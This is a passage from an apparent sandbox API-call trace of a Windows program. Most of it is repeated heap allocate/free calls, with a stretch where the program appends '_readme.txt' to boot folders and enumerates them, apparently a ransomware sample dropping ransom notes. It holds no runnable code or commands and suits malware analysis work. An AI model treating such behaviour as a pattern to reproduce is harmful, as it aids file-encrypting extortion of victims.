lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.558] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.558] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.559] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.559] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.560] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.560] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.561] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.561] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0146.561] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.561] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.561] PathFindFileNameW (pszPath="") returned="" [0146.561] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.561] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.561] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.561] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.561] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0146.561] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.561] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.561] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0146.562] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.562] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.562] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.563] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.563] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.563] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.563] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.563] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.563] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.563] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.563] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.564] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.564] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.565] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.565] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.566] HeapFree (in: hHeap=0x6e0000, 